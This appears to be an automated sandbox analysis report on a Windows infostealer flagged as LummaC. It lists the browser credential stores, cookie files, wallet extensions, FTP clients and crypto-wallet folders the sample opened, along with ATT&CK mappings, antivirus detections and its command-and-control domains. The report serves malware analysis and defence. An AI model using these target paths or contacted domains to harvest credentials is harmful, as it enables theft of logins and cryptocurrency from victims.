                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: YKri2nEBWE.exe PID: 6460, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: YKri2nEBWE.exe PID: 6460, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                YKri2nEBWE.exe57%VirustotalBrowse
                YKri2nEBWE.exe63%ReversingLabsWin32.Infostealer.Tinba
                YKri2nEBWE.exe100%AviraTR/Crypt.TPM.Gen
                YKri2nEBWE.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/piNXxr&100%Avira URL Cloudmalware
                https://lev-tolstoi.com/W100%Avira URL Cloudmalware
                https://community.fastly.steamstatiS0%Avira URL Cloudsafe
                https://community.fastly.steamstatics0%Avira URL Cloudsafe
                https://community.y0%Avira URL Cloudsafe
                https://lev-tolstoi.com/t100%Avira URL Cloudmalware
                https://community.=0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apil100%Avira URL Cloudmalware
                https://community.fastly.steamstatic.cc0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apix100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apis100%Avira URL Cloudmalware
                https://lev-tolstoi.com/uo0100%Avira URL Cloudmalware
                https://community.fastly.steamb0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apiB100%Avira URL Cloudmalware
                https://lev-tolstoi.com/0100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apimC100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		104.102.49.254
                		truefalse
                  		high
                  lev-tolstoi.com
                  		172.67.157.254
                  		truefalse
                    		high
                    wordyfindy.lat
                    		unknown
                    		unknownfalse
                      		high
                      slipperyloo.lat
                      		unknown
                      		unknownfalse
                        		high
                        curverpluch.lat
                        		unknown
                        		unknownfalse
                          		high
                          tentabatte.lat
                          		unknown
                          		unknownfalse
                            		high
                            manyrestro.lat
                            		unknown
                            		unknownfalse
                              		high
                              bashfulacid.lat
                              		unknown
                              		unknownfalse
                                		high
                                shapestickyr.lat
                                		unknown
                                		unknownfalse
                                  		high
                                  observerfry.lat
                                  		unknown
                                  		unknownfalse
                                    		high
                                    talkynicer.lat
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      slipperyloo.latfalse
                                        		high
                                        observerfry.latfalse
                                          		high
                                          https://steamcommunity.com/profiles/76561199724331900false
                                            		high
                                            https://lev-tolstoi.com/apifalse
                                              		high
                                              curverpluch.latfalse
                                                		high
                                                tentabatte.latfalse
                                                  		high
                                                  manyrestro.latfalse
                                                    		high
                                                    bashfulacid.latfalse
                                                      		high
                                                      wordyfindy.latfalse
                                                        		high
                                                        shapestickyr.latfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabYKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/?subsection=broadcastsYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://lev-tolstoi.com/tYKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://store.steampowered.com/subscriber_agreement/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://lev-tolstoi.com/piNXxr&YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://community.fastly.steamstaticsYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.valvesoftware.com/legal.htmYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://lev-tolstoi.com/WYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
